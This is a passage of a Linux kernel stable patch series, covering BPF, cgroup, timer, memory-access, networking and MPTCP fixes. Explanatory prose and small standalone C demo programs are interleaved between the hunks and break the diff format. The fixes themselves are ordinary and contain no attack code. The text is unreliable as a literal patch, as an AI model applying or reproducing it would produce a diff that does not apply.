+@@ -735,13 +735,12 @@ static bool btf_name_offset_valid(const struct btf *btf, u32 offset)
+ 	return offset < btf->hdr.str_len;
+ }
+ 
+-static bool __btf_name_char_ok(char c, bool first, bool dot_ok)
++static bool __btf_name_char_ok(char c, bool first)
+ {
+ 	if ((first ? !isalpha(c) :
+ 		     !isalnum(c)) &&
+ 	    c != '_' &&
+-	    ((c == '.' && !dot_ok) ||
+-	      c != '.'))
++	    c != '.')
+ 		return false;
+ 	return true;
+ }
+@@ -758,20 +757,20 @@ static const char *btf_str_by_offset(const struct btf *btf, u32 offset)
+ 	return NULL;
+ }
+ 
+-static bool __btf_name_valid(const struct btf *btf, u32 offset, bool dot_ok)
++static bool __btf_name_valid(const struct btf *btf, u32 offset)
+ {
+ 	/* offset must be valid */
+ 	const char *src = btf_str_by_offset(btf, offset);
+ 	const char *src_limit;
+ 
+-	if (!__btf_name_char_ok(*src, true, dot_ok))
++	if (!__btf_name_char_ok(*src, true))
+ 		return false;
+ 
+ 	/* set a limit on identifier length */
+ 	src_limit = src + KSYM_NAME_LEN;
+ 	src++;
+ 	while (*src && src < src_limit) {
+-		if (!__btf_name_char_ok(*src, false, dot_ok))
++		if (!__btf_name_char_ok(*src, false))
+ 			return false;
+ 		src++;
+ 	}
+@@ -779,17 +778,14 @@ static bool __btf_name_valid(const struct btf *btf, u32 offset, bool dot_ok)
+ 	return !*src;
+ }
+ 
+-/* Only C-style identifier is permitted. This can be relaxed if
+- * necessary.
+- */
+ static bool btf_name_valid_identifier(const struct btf *btf, u32 offset)
+ {
+-	return __btf_name_valid(btf, offset, false);
++	return __btf_name_valid(btf, offset);
+ }
+ 
+ static bool btf_name_valid_section(const struct btf *btf, u32 offset)
+ {
+-	return __btf_name_valid(btf, offset, true);
++	return __btf_name_valid(btf, offset);
+ }
+ 
+ static const char *__btf_name_by_offset(const struct btf *btf, u32 offset)
+@@ -4044,7 +4040,7 @@ static s32 btf_var_check_meta(struct btf_verifier_env *env,
+ 	}
+ 
+ 	if (!t->name_off ||
+-	    !__btf_name_valid(env->btf, t->name_off, true)) {
++	    !__btf_name_valid(env->btf, t->name_off)) {
+ 		btf_verifier_log_type(env, t, "Invalid name");
+ 		return -EINVAL;
+ 	}
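
An equivalent, perhaps more direct reading of the simplified name-character check (illustrative only):

	static bool name_char_ok(char c, bool first)
	{
		if (first)
			return isalpha(c) || c == '_' || c == '.';
		return isalnum(c) || c == '_' || c == '.';
	}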
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 6c61dba26f4d9..8633ec4f92df3 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -3383,6 +3383,11 @@ static int bpf_prog_attach_check_attach_type(const struct bpf_prog *prog,
+ 		return prog->enforce_expected_attach_type &&
+ 			prog->expected_attach_type != attach_type ?
+ 			-EINVAL : 0;
++	case BPF_PROG_TYPE_KPROBE:
++		if (prog->expected_attach_type == BPF_TRACE_KPROBE_MULTI &&
++		    attach_type != BPF_TRACE_KPROBE_MULTI)
++			return -EINVAL;
++		return 0;
+ 	default:
+ 		return 0;
+ 	}
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 280e689517e10..49c6b5e0855cd 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3061,6 +3061,11 @@ static void save_register_state(struct bpf_func_state *state,
+ 		scrub_spilled_slot(&state->stack[spi].slot_type[i - 1]);
+ }
+ 
++static bool is_bpf_st_mem(struct bpf_insn *insn)
++{
++	return BPF_CLASS(insn->code) == BPF_ST && BPF_MODE(insn->code) == BPF_MEM;
++}
++
+ /* check_stack_{read,write}_fixed_off functions track spill/fill of registers,
+  * stack boundary and alignment are checked in check_mem_access()
+  */
+@@ -3072,8 +3077,9 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ {
+ 	struct bpf_func_state *cur; /* state of the current function */
+ 	int i, slot = -off - 1, spi = slot / BPF_REG_SIZE, err;
+-	u32 dst_reg = env->prog->insnsi[insn_idx].dst_reg;
++	struct bpf_insn *insn = &env->prog->insnsi[insn_idx];
+ 	struct bpf_reg_state *reg = NULL;
++	u32 dst_reg = insn->dst_reg;
+ 
+ 	err = grow_stack_state(state, round_up(slot + 1, BPF_REG_SIZE));
+ 	if (err)
+@@ -3122,6 +3128,16 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 				return err;
+ 		}
+ 		save_register_state(state, spi, reg, size);
++		/* Break the relation on a narrowing spill. */
++		if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
++			state->stack[spi].spilled_ptr.id = 0;
++	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
++		   insn->imm != 0 && env->bpf_capable) {
++		struct bpf_reg_state fake_reg = {};
++
++		__mark_reg_known(&fake_reg, (u32)insn->imm);
++		fake_reg.type = SCALAR_VALUE;
++		save_register_state(state, spi, &fake_reg, size);
+ 	} else if (reg && is_spillable_regtype(reg->type)) {
+ 		/* register containing pointer is being spilled into stack */
+ 		if (size != BPF_REG_SIZE) {
+@@ -3156,7 +3172,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 			state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
+ 
+ 		/* when we zero initialize stack slots mark them as such */
+-		if (reg && register_is_null(reg)) {
++		if ((reg && register_is_null(reg)) ||
++		    (!reg && is_bpf_st_mem(insn) && insn->imm == 0)) {
+ 			/* backtracking doesn't work for STACK_ZERO yet. */
+ 			err = mark_chain_precision(env, value_regno);
+ 			if (err)
+@@ -13819,9 +13836,10 @@ static int jit_subprogs(struct bpf_verifier_env *env)
+ 	}
+ 
+ 	/* finally lock prog and jit images for all functions and
+-	 * populate kallsysm
++	 * populate kallsyms. Begin at the first subprogram, since
++	 * bpf_prog_load will add the kallsyms for the main program.
+ 	 */
+-	for (i = 0; i < env->subprog_cnt; i++) {
++	for (i = 1; i < env->subprog_cnt; i++) {
+ 		bpf_prog_lock_ro(func[i]);
+ 		bpf_prog_kallsyms_add(func[i]);
+ 	}
+@@ -13847,6 +13865,8 @@ static int jit_subprogs(struct bpf_verifier_env *env)
+ 	prog->jited = 1;
+ 	prog->bpf_func = func[0]->bpf_func;
+ 	prog->jited_len = func[0]->jited_len;
++	prog->aux->extable = func[0]->aux->extable;
++	prog->aux->num_exentries = func[0]->aux->num_exentries;
+ 	prog->aux->func = func;
+ 	prog->aux->func_cnt = env->subprog_cnt;
+ 	bpf_prog_jit_attempt_done(prog);
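
The instruction shape the new is_bpf_st_mem() branch recognizes stores an immediate straight to the stack; for example, using the helper macro from linux/filter.h:

	/* *(u64 *)(r10 - 8) = 42 -- now tracked as a known scalar spill */
	struct bpf_insn st = BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 42);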
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 36c95626afecc..2380c4daef33d 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1782,7 +1782,7 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ {
+ 	struct cgroup *dcgrp = &dst_root->cgrp;
+ 	struct cgroup_subsys *ss;
+-	int ssid, i, ret;
++	int ssid, ret;
+ 	u16 dfl_disable_ss_mask = 0;
+ 
+ 	lockdep_assert_held(&cgroup_mutex);
+@@ -1826,7 +1826,8 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ 		struct cgroup_root *src_root = ss->root;
+ 		struct cgroup *scgrp = &src_root->cgrp;
+ 		struct cgroup_subsys_state *css = cgroup_css(scgrp, ss);
+-		struct css_set *cset;
++		struct css_set *cset, *cset_pos;
++		struct css_task_iter *it;
+ 
+ 		WARN_ON(!css || cgroup_css(dcgrp, ss));
+ 
+@@ -1844,9 +1845,22 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ 		css->cgroup = dcgrp;
+ 
+ 		spin_lock_irq(&css_set_lock);
+-		hash_for_each(css_set_table, i, cset, hlist)
++		WARN_ON(!list_empty(&dcgrp->e_csets[ss->id]));
++		list_for_each_entry_safe(cset, cset_pos, &scgrp->e_csets[ss->id],
++					 e_cset_node[ss->id]) {
+ 			list_move_tail(&cset->e_cset_node[ss->id],
+ 				       &dcgrp->e_csets[ss->id]);
++			/*
++			 * All css_sets of scgrp are moved, in the same order,
++			 * to dcgrp; patch in-flight iterators to preserve
++			 * correct iteration. Since an iterator is always
++			 * advanced right away and finishes when it->cset_pos
++			 * meets it->cset_head, updating it->cset_head is
++			 * enough here.
++			 */
++			list_for_each_entry(it, &cset->task_iters, iters_node)
++				if (it->cset_head == &scgrp->e_csets[ss->id])
++					it->cset_head = &dcgrp->e_csets[ss->id];
++		}
+ 		spin_unlock_irq(&css_set_lock);
+ 
+ 		if (ss->css_rstat_flush) {
+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 936473203a6b5..122dacb3a4439 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -108,16 +108,18 @@ static int freezer_css_online(struct cgroup_subsys_state *css)
+ 	struct freezer *freezer = css_freezer(css);
+ 	struct freezer *parent = parent_freezer(freezer);
+ 
++	cpus_read_lock();
+ 	mutex_lock(&freezer_mutex);
+ 
+ 	freezer->state |= CGROUP_FREEZER_ONLINE;
+ 
+ 	if (parent && (parent->state & CGROUP_FREEZING)) {
+ 		freezer->state |= CGROUP_FREEZING_PARENT | CGROUP_FROZEN;
+-		static_branch_inc(&freezer_active);
++		static_branch_inc_cpuslocked(&freezer_active);
+ 	}
+ 
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ 	return 0;
+ }
+ 
+@@ -132,14 +134,16 @@ static void freezer_css_offline(struct cgroup_subsys_state *css)
+ {
+ 	struct freezer *freezer = css_freezer(css);
+ 
++	cpus_read_lock();
+ 	mutex_lock(&freezer_mutex);
+ 
+ 	if (freezer->state & CGROUP_FREEZING)
+-		static_branch_dec(&freezer_active);
++		static_branch_dec_cpuslocked(&freezer_active);
+ 
+ 	freezer->state = 0;
+ 
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ }
+ 
+ static void freezer_css_free(struct cgroup_subsys_state *css)
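
The freezer hunks are a lock-ordering fix: static_branch_inc()/_dec() take the CPU-hotplug lock internally, and that lock must nest outside freezer_mutex, so the code now takes cpus_read_lock() first and switches to the *_cpuslocked variants. A toy pthread sketch of that discipline, with made-up names standing in for the kernel primitives:

    #include <pthread.h>
    #include <stdio.h>

    static pthread_mutex_t hotplug = PTHREAD_MUTEX_INITIALIZER; /* cpus_read_lock() */
    static pthread_mutex_t freezer = PTHREAD_MUTEX_INITIALIZER; /* freezer_mutex    */
    static int key_count; /* stand-in for the freezer_active static branch */

    /* Like static_branch_inc(): takes the hotplug lock by itself. Calling
     * this while already holding 'freezer' would invert the lock order.
     */
    static void branch_inc(void)
    {
            pthread_mutex_lock(&hotplug);
            key_count++;
            pthread_mutex_unlock(&hotplug);
    }

    /* Like static_branch_inc_cpuslocked(): caller already holds 'hotplug'. */
    static void branch_inc_cpuslocked(void)
    {
            key_count++;
    }

    int main(void)
    {
            branch_inc(); /* fine with no other lock held */

            /* The fixed freezer_css_online() ordering: */
            pthread_mutex_lock(&hotplug);   /* cpus_read_lock()              */
            pthread_mutex_lock(&freezer);   /* mutex_lock(&freezer_mutex)    */
            branch_inc_cpuslocked();        /* static_branch_inc_cpuslocked() */
            pthread_mutex_unlock(&freezer);
            pthread_mutex_unlock(&hotplug); /* cpus_read_unlock()            */

            printf("key_count=%d\n", key_count);
            return 0;
    }
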
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index 65b8658da829e..e9138cd7a0f52 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -218,19 +218,8 @@ static void tick_setup_device(struct tick_device *td,
+ 		 * this cpu:
+ 		 */
+ 		if (tick_do_timer_cpu == TICK_DO_TIMER_BOOT) {
+-			ktime_t next_p;
+-			u32 rem;
+-
+ 			tick_do_timer_cpu = cpu;
+-
+-			next_p = ktime_get();
+-			div_u64_rem(next_p, TICK_NSEC, &rem);
+-			if (rem) {
+-				next_p -= rem;
+-				next_p += TICK_NSEC;
+-			}
+-
+-			tick_next_period = next_p;
++			tick_next_period = ktime_get();
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+ 			 * The boot CPU may be nohz_full, in which case set
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index a46506f7ec6d0..d6fb6a676bbbb 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -161,8 +161,19 @@ static ktime_t tick_init_jiffy_update(void)
+ 	raw_spin_lock(&jiffies_lock);
+ 	write_seqcount_begin(&jiffies_seq);
+ 	/* Did we start the jiffies update yet ? */
+-	if (last_jiffies_update == 0)
++	if (last_jiffies_update == 0) {
++		u32 rem;
++
++		/*
++		 * Ensure that the tick is aligned to a multiple of
++		 * TICK_NSEC.
++		 */
++		div_u64_rem(tick_next_period, TICK_NSEC, &rem);
++		if (rem)
++			tick_next_period += TICK_NSEC - rem;
++
+ 		last_jiffies_update = tick_next_period;
++	}
+ 	period = last_jiffies_update;
+ 	write_seqcount_end(&jiffies_seq);
+ 	raw_spin_unlock(&jiffies_lock);
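
Taken together, the two timer hunks move the TICK_NSEC alignment from CPU bring-up into tick_init_jiffy_update(), so it is the first jiffies update that gets rounded up to a tick boundary. The rounding itself is simple remainder arithmetic; a standalone sketch (example tick length assumed):

    #include <stdio.h>
    #include <stdint.h>

    #define TICK_NSEC 4000000ULL /* assumed example: HZ=250 -> 4 ms tick */

    /* Round a nanosecond timestamp up to the next TICK_NSEC boundary,
     * mirroring the div_u64_rem() arithmetic in tick_init_jiffy_update().
     */
    static uint64_t align_to_tick(uint64_t t)
    {
            uint64_t rem = t % TICK_NSEC;

            if (rem)
                    t += TICK_NSEC - rem;
            return t;
    }

    int main(void)
    {
            printf("%llu\n", (unsigned long long)align_to_tick(4000001ULL)); /* 8000000  */
            printf("%llu\n", (unsigned long long)align_to_tick(8000000ULL)); /* unchanged */
            return 0;
    }
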
+diff --git a/mm/maccess.c b/mm/maccess.c
+index 074f6b086671e..518a25667323e 100644
+--- a/mm/maccess.c
++++ b/mm/maccess.c
+@@ -5,6 +5,7 @@
+ #include <linux/export.h>
+ #include <linux/mm.h>
+ #include <linux/uaccess.h>
++#include <asm/tlb.h>
+ 
+ bool __weak copy_from_kernel_nofault_allowed(const void *unsafe_src,
+ 		size_t size)
+@@ -113,11 +114,16 @@ Efault:
+ long copy_from_user_nofault(void *dst, const void __user *src, size_t size)
+ {
+ 	long ret = -EFAULT;
+-	if (access_ok(src, size)) {
+-		pagefault_disable();
+-		ret = __copy_from_user_inatomic(dst, src, size);
+-		pagefault_enable();
+-	}
++
++	if (!__access_ok(src, size))
++		return ret;
++
++	if (!nmi_uaccess_okay())
++		return ret;
++
++	pagefault_disable();
++	ret = __copy_from_user_inatomic(dst, src, size);
++	pagefault_enable();
+ 
+ 	if (ret)
+ 		return -EFAULT;
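
copy_from_user_nofault() now also bails out when the MMU context can't be trusted (nmi_uaccess_okay() fails, e.g. mid CR3 switch on x86), in addition to the range check, before disabling page faults. The ordering of the guards is the point; here is a hedged userspace model with stub predicates, since the real checks are arch-specific:

    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>

    /* Stubs standing in for access_ok()/nmi_uaccess_okay()/pagefault_*();
     * the real checks are arch-specific, these only model the control flow.
     */
    static bool access_ok_stub(const void *p, size_t n) { return p && n; }
    static bool nmi_uaccess_okay_stub(void) { return true; }
    static void pagefault_disable(void) { }
    static void pagefault_enable(void)  { }

    static long copy_from_user_nofault_model(void *dst, const void *src, size_t n)
    {
            if (!access_ok_stub(src, n))  /* range check first        */
                    return -14;           /* -EFAULT                  */
            if (!nmi_uaccess_okay_stub()) /* MMU context trustworthy? */
                    return -14;

            pagefault_disable();
            memcpy(dst, src, n); /* kernel: __copy_from_user_inatomic() */
            pagefault_enable();
            return 0;
    }

    int main(void)
    {
            char src[] = "hello", dst[8] = "";

            printf("ret=%ld dst=%s\n",
                   copy_from_user_nofault_model(dst, src, sizeof(src)), dst);
            return 0;
    }
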
+diff --git a/mm/memfd.c b/mm/memfd.c
+index 08f5f8304746f..b0104b49bf82c 100644
+--- a/mm/memfd.c
++++ b/mm/memfd.c
+@@ -328,7 +328,8 @@ SYSCALL_DEFINE2(memfd_create,
+ 
+ 	if (flags & MFD_ALLOW_SEALING) {
+ 		file_seals = memfd_file_seals_ptr(file);
+-		*file_seals &= ~F_SEAL_SEAL;
++		if (file_seals)
++			*file_seals &= ~F_SEAL_SEAL;
+ 	}
+ 
+ 	fd_install(fd, file);
+diff --git a/mm/usercopy.c b/mm/usercopy.c
+index c1ee15a986338..434fce112acb9 100644
+--- a/mm/usercopy.c
++++ b/mm/usercopy.c
+@@ -172,7 +172,7 @@ static inline void check_heap_object(const void *ptr, unsigned long n,
+ 		return;
+ 	}
+ 
+-	if (is_vmalloc_addr(ptr)) {
++	if (is_vmalloc_addr(ptr) && !pagefault_disabled()) {
+ 		struct vmap_area *area = find_vmap_area(addr);
+ 
+ 		if (!area)
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 83f590d8d0850..b021cb9c95ef3 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1355,12 +1355,6 @@ set_sndbuf:
+ 		__sock_set_mark(sk, val);
+ 		break;
+ 	case SO_RCVMARK:
+-		if (!sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_RAW) &&
+-		    !sockopt_ns_capable(sock_net(sk)->user_ns, CAP_NET_ADMIN)) {
+-			ret = -EPERM;
+-			break;
+-		}
+-
+ 		sock_valbool_flag(sk, SOCK_RCVMARK, valbool);
+ 		break;
+ 
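
Removing the capability check for SO_RCVMARK is reasonable because the option only makes the socket *report* the packet mark via a control message; it grants nothing that setting a mark would. On a fixed kernel an unprivileged program can enable it like this (sketch; SO_RCVMARK may need a manual define on older libcs):

    #include <stdio.h>
    #include <sys/socket.h>
    #include <unistd.h>

    #ifndef SO_RCVMARK
    #define SO_RCVMARK 75 /* uapi value; define manually if libc lacks it */
    #endif

    int main(void)
    {
            int one = 1;
            int fd = socket(AF_INET, SOCK_DGRAM, 0);

            if (fd < 0) {
                    perror("socket");
                    return 1;
            }
            /* No CAP_NET_RAW/CAP_NET_ADMIN required on fixed kernels. */
            if (setsockopt(fd, SOL_SOCKET, SO_RCVMARK, &one, sizeof(one)) < 0)
                    perror("setsockopt(SO_RCVMARK)");
            else
                    puts("SO_RCVMARK enabled; marks arrive as cmsg data");
            close(fd);
            return 0;
    }
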
+diff --git a/net/ipv4/esp4_offload.c b/net/ipv4/esp4_offload.c
+index 3969fa805679c..ee848be59e65a 100644
+--- a/net/ipv4/esp4_offload.c
++++ b/net/ipv4/esp4_offload.c
+@@ -340,6 +340,9 @@ static int esp_xmit(struct xfrm_state *x, struct sk_buff *skb,  netdev_features_
+ 
+ 	secpath_reset(skb);
+ 
++	if (skb_needs_linearize(skb, skb->dev->features) &&
++	    __skb_linearize(skb))
++		return -ENOMEM;
+ 	return 0;
+ }
+ 
+diff --git a/net/ipv4/xfrm4_input.c b/net/ipv4/xfrm4_input.c
+index ad2afeef4f106..eac206a290d05 100644
+--- a/net/ipv4/xfrm4_input.c
++++ b/net/ipv4/xfrm4_input.c
+@@ -164,6 +164,7 @@ drop:
+ 	kfree_skb(skb);
+ 	return 0;
+ }
++EXPORT_SYMBOL(xfrm4_udp_encap_rcv);
+ 
+ int xfrm4_rcv(struct sk_buff *skb)
+ {
+diff --git a/net/ipv6/esp6_offload.c b/net/ipv6/esp6_offload.c
+index 242f4295940e6..fc6a5be732634 100644
+--- a/net/ipv6/esp6_offload.c
++++ b/net/ipv6/esp6_offload.c
+@@ -375,6 +375,9 @@ static int esp6_xmit(struct xfrm_state *x, struct sk_buff *skb,  netdev_features
+ 
+ 	secpath_reset(skb);
+ 
++	if (skb_needs_linearize(skb, skb->dev->features) &&
++	    __skb_linearize(skb))
++		return -ENOMEM;
+ 	return 0;
+ }
+ 
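
The esp4 and esp6 offload hunks apply the same late fix-up: after encapsulation the skb may still be paged while the device lacks the features to transmit nonlinear buffers, so it must be flattened before handing it down. Linearizing is conceptually just coalescing fragments into one contiguous allocation, as in this standalone sketch (plain fragment arrays, not real skbs):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    struct frag { const void *data; size_t len; };

    /* Coalesce fragments into one contiguous buffer -- the moral
     * equivalent of __skb_linearize() for a device without SG support.
     */
    static void *linearize(const struct frag *f, int nfrags, size_t *out_len)
    {
            size_t total = 0, off = 0;
            char *buf;
            int i;

            for (i = 0; i < nfrags; i++)
                    total += f[i].len;
            buf = malloc(total);
            if (!buf)
                    return NULL; /* the kernel path returns -ENOMEM */
            for (i = 0; i < nfrags; i++) {
                    memcpy(buf + off, f[i].data, f[i].len);
                    off += f[i].len;
            }
            *out_len = total;
            return buf;
    }

    int main(void)
    {
            struct frag f[] = { { "ESP|", 4 }, { "payload", 7 } };
            size_t len;
            char *p = linearize(f, 2, &len);

            if (!p)
                    return 1;
            printf("%.*s (%zu bytes)\n", (int)len, p, len);
            free(p);
            return 0;
    }
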
+diff --git a/net/ipv6/xfrm6_input.c b/net/ipv6/xfrm6_input.c
+index 04cbeefd89828..4907ab241d6be 100644
+--- a/net/ipv6/xfrm6_input.c
++++ b/net/ipv6/xfrm6_input.c
+@@ -86,6 +86,9 @@ int xfrm6_udp_encap_rcv(struct sock *sk, struct sk_buff *skb)
+ 	__be32 *udpdata32;
+ 	__u16 encap_type = up->encap_type;
+ 
++	if (skb->protocol == htons(ETH_P_IP))
++		return xfrm4_udp_encap_rcv(sk, skb);
++
+ 	/* if this is not encapsulated socket, then just return now */
+ 	if (!encap_type)
+ 		return 1;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 59186997c3e2e..a2c6ce40e4269 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -53,7 +53,7 @@ enum {
+ static struct percpu_counter mptcp_sockets_allocated ____cacheline_aligned_in_smp;
+ 
+ static void __mptcp_destroy_sock(struct sock *sk);
+-static void __mptcp_check_send_data_fin(struct sock *sk);
++static void mptcp_check_send_data_fin(struct sock *sk);
+ 
+ DEFINE_PER_CPU(struct mptcp_delegated_action, mptcp_delegated_actions);
+ static struct net_device mptcp_napi_dev;
+@@ -420,8 +420,7 @@ static bool mptcp_pending_data_fin_ack(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	return !__mptcp_check_fallback(msk) &&
+-	       ((1 << sk->sk_state) &
++	return ((1 << sk->sk_state) &
+ 		(TCPF_FIN_WAIT1 | TCPF_CLOSING | TCPF_LAST_ACK)) &&
+ 	       msk->write_seq == READ_ONCE(msk->snd_una);
+ }
+@@ -579,9 +578,6 @@ static bool mptcp_check_data_fin(struct sock *sk)
+ 	u64 rcv_data_fin_seq;
+ 	bool ret = false;
+ 
+-	if (__mptcp_check_fallback(msk))
+-		return ret;
+-
+ 	/* Need to ack a DATA_FIN received from a peer while this side
+ 	 * of the connection is in ESTABLISHED, FIN_WAIT1, or FIN_WAIT2.
+ 	 * msk->rcv_data_fin was set when parsing the incoming options
+@@ -619,7 +615,8 @@ static bool mptcp_check_data_fin(struct sock *sk)
+ 		}
+ 
+ 		ret = true;
+-		mptcp_send_ack(msk);
++		if (!__mptcp_check_fallback(msk))
++			mptcp_send_ack(msk);
+ 		mptcp_close_wake_up(sk);
+ 	}
+ 	return ret;
+@@ -846,12 +843,12 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 	return true;
+ }
+ 
+-static void __mptcp_flush_join_list(struct sock *sk)
++static void __mptcp_flush_join_list(struct sock *sk, struct list_head *join_list)
+ {
+ 	struct mptcp_subflow_context *tmp, *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	list_for_each_entry_safe(subflow, tmp, &msk->join_list, node) {
++	list_for_each_entry_safe(subflow, tmp, join_list, node) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		bool slow = lock_sock_fast(ssk);
+ 
+@@ -1606,7 +1603,7 @@ out:
+ 	if (!mptcp_timer_pending(sk))
+ 		mptcp_reset_timer(sk);
+ 	if (do_check_data_fin)
+-		__mptcp_check_send_data_fin(sk);
++		mptcp_check_send_data_fin(sk);
+ }
+ 
+ static void __mptcp_subflow_push_pending(struct sock *sk, struct sock *ssk)
+@@ -1708,7 +1705,13 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 		if (ret && ret != -EINPROGRESS && ret != -ERESTARTSYS && ret != -EINTR)
+ 			*copied_syn = 0;
+ 	} else if (ret && ret != -EINPROGRESS) {
+-		mptcp_disconnect(sk, 0);
++		/* The disconnect() op called by tcp_sendmsg_fastopen()/
++		 * __inet_stream_connect() can fail due to the locking checks,
++		 * see mptcp_disconnect().
++		 * Attempt it again outside the problematic scope.
++		 */
++		if (!mptcp_disconnect(sk, 0))
++			sk->sk_socket->state = SS_UNCONNECTED;
+ 	}
+ 
+ 	return ret;
+@@ -2375,7 +2378,10 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+-		tcp_disconnect(ssk, 0);
++		/* The MPTCP code never waits on the subflow sockets, so the
++		 * TCP-level disconnect should never fail
++		 */
++		WARN_ON_ONCE(tcp_disconnect(ssk, 0));
+ 		msk->subflow->state = SS_UNCONNECTED;
+ 		mptcp_subflow_ctx_reset(subflow);
+ 		release_sock(ssk);
+@@ -2656,8 +2662,6 @@ static void mptcp_worker(struct work_struct *work)
+ 	if (unlikely((1 << state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 		goto unlock;
+ 
+-	mptcp_check_data_fin_ack(sk);
+-
+ 	mptcp_check_fastclose(msk);
+ 
+ 	mptcp_pm_nl_work(msk);
+@@ -2665,7 +2669,8 @@ static void mptcp_worker(struct work_struct *work)
+ 	if (test_and_clear_bit(MPTCP_WORK_EOF, &msk->flags))
+ 		mptcp_check_for_eof(msk);
+ 
+-	__mptcp_check_send_data_fin(sk);
++	mptcp_check_send_data_fin(sk);
++	mptcp_check_data_fin_ack(sk);
+ 	mptcp_check_data_fin(sk);
+ 
+ 	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+@@ -2799,13 +2804,19 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 			break;
+ 		fallthrough;
+ 	case TCP_SYN_SENT:
+-		tcp_disconnect(ssk, O_NONBLOCK);
++		WARN_ON_ONCE(tcp_disconnect(ssk, O_NONBLOCK));
+ 		break;
+ 	default:
+ 		if (__mptcp_check_fallback(mptcp_sk(sk))) {
+ 			pr_debug("Fallback");
+ 			ssk->sk_shutdown |= how;
+ 			tcp_shutdown(ssk, how);
++
++			/* simulate the data_fin ack reception to let the state
++			 * machine move forward
++			 */
++			WRITE_ONCE(mptcp_sk(sk)->snd_una, mptcp_sk(sk)->snd_nxt);
++			mptcp_schedule_work(sk);
+ 		} else {
+ 			pr_debug("Sending DATA_FIN on subflow %p", ssk);
+ 			tcp_send_ack(ssk);
+@@ -2845,7 +2856,7 @@ static int mptcp_close_state(struct sock *sk)
+ 	return next & TCP_ACTION_FIN;
+ }
+ 
+-static void __mptcp_check_send_data_fin(struct sock *sk)
++static void mptcp_check_send_data_fin(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+@@ -2863,19 +2874,6 @@ static void __mptcp_check_send_data_fin(struct sock *sk)
+ 
+ 	WRITE_ONCE(msk->snd_nxt, msk->write_seq);
+ 
+-	/* fallback socket will not get data_fin/ack, can move to the next
+-	 * state now
+-	 */
+-	if (__mptcp_check_fallback(msk)) {
+-		WRITE_ONCE(msk->snd_una, msk->write_seq);
+-		if ((1 << sk->sk_state) & (TCPF_CLOSING | TCPF_LAST_ACK)) {
+-			inet_sk_state_store(sk, TCP_CLOSE);
+-			mptcp_close_wake_up(sk);
+-		} else if (sk->sk_state == TCP_FIN_WAIT1) {
+-			inet_sk_state_store(sk, TCP_FIN_WAIT2);
+-		}
+-	}
+-
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *tcp_sk = mptcp_subflow_tcp_sock(subflow);
+ 
+@@ -2895,7 +2893,7 @@ static void __mptcp_wr_shutdown(struct sock *sk)
+ 	WRITE_ONCE(msk->write_seq, msk->write_seq + 1);
+ 	WRITE_ONCE(msk->snd_data_fin_enable, 1);
+ 
+-	__mptcp_check_send_data_fin(sk);
++	mptcp_check_send_data_fin(sk);
+ }
+ 
+ static void __mptcp_destroy_sock(struct sock *sk)
+@@ -3051,13 +3049,18 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
++	/* Deny disconnect if other threads are blocked in sk_wait_event()
++	 * or inet_wait_for_connect().
++	 */
++	if (sk->sk_wait_pending)
++		return -EBUSY;
++
+ 	/* We are on the fastopen error path. We can't call straight into the
+ 	 * subflows cleanup code due to lock nesting (we are already under
+-	 * msk->firstsocket lock). Do nothing and leave the cleanup to the
+-	 * caller.
++	 * msk->firstsocket lock).
+ 	 */
+ 	if (msk->fastopening)
